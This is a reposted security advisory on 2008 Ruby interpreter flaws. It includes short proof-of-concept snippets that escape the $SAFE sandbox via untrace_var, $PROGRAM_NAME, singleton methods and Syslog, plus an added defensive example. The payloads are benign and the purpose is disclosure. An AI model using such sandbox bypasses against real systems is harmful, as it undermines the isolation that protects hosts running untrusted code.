Multiple security flaws found in the Ruby interpreter and its API libraries
程序员文章站
2022-05-18 20:57:40
Multiple security flaws have been found in Ruby, affecting Safe Level, WEBrick, Dl and DNS lookup. The official Ruby website advises users to upgrade Ruby to the latest version as soon as possible. The flaws include:
untrace_var is permitted at safe level 4.
$PROGRAM_NAME may be modified at safe level 4.
Insecure methods may be called at safe level 1-3.
Syslog operations are permitted at safe level 4.
The flaw found in WEBrick may lead to a DoS attack. For details see http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/
Just noticed that the official Ruby site also has a Chinese version: http://www.ruby-lang.org/zh_CN/news/2008/08/08/multiple-vulnerabilities-in-ruby
untrace_var is permitted at safe level 4.
```ruby
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
  $SAFE = 4
  # untrace_var should be rejected at safe level 4, but the
  # returned trace proc can be recovered and invoked
  eval %q{
    proc = untrace_var :$VAR
    proc.first.call("aaa")
  }
end.join
```
$PROGRAM_NAME may be modified at safe level 4.
```ruby
Thread.new do
  $SAFE = 4
  # $PROGRAM_NAME should be read-only at safe level 4, but in-place
  # modification via String#replace is not blocked
  eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
```
Insecure methods may be called at safe level 1-3.
```ruby
class Hello
  def world
    Thread.new do
      $SAFE = 4
      msg = "Hello, World!"
      # singleton method defined at safe level 4 on the returned object
      def msg.size
        self.replace self*10 # replace string
        1 # return wrong size
      end
      msg
    end.value
  end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
  # the overridden size is called here despite the lower safe level
  puts s if s.size < 20 # print string which size is less than 20
end
```
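The third issue above turns on a String whose singleton `size` method lies about its length while also mutating the receiver. The following is an added example, not code from the advisory or from the Ruby project: it reproduces only the object-level trick (modern Ruby no longer enforces `$SAFE`, so the safe-level assignment is omitted) and shows two checks a caller can apply to a string received from an untrusted context. `lying_string`, `plain_string?`, `normalize` and `demo` are names chosen here.

```ruby
# Added example: the object-level part of the "insecure methods at safe
# level 1-3" issue, without $SAFE (not enforced in modern Ruby).

# Construct a String whose singleton `size` grows the string tenfold
# and then reports a bogus size, mirroring the advisory's PoC.
def lying_string
  msg = +"Hello, World!"     # unary plus: make sure the literal is mutable
  def msg.size
    replace(self * 10)        # side effect: now 130 characters long
    1                         # lie about the size
  end
  msg
end

# Check 1: a String produced by ordinary code has no singleton methods;
# reject any object that carries them before calling its methods.
def plain_string?(obj)
  obj.is_a?(String) && obj.singleton_methods.empty?
end

# Check 2: copy the bytes into a fresh String. String.new copies the
# contents but not the singleton class, so `size` on the copy is honest.
def normalize(obj)
  String.new(obj)
end

# Returns [singleton-free?, size as reported by the object, real size]
def demo
  s = lying_string
  reported = s.size             # 1 (bogus); s is now 130 characters
  actual   = normalize(s).size  # 130 (honest)
  [plain_string?(s), reported, actual]
end
```

Of the two checks, `normalize` is the one to prefer: it yields a value whose every method is the stock `String` implementation, whereas the singleton-method test only detects the specific trick shown here.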
Syslog operations are permitted at safe level 4.
```ruby
require "syslog"
Syslog.open
Thread.new do
  $SAFE = 4
  # all of these syslog operations should be rejected at safe level 4
  eval %q{
    Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
    Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
    Syslog.info("masked")
    Syslog.close
  }
end.join
```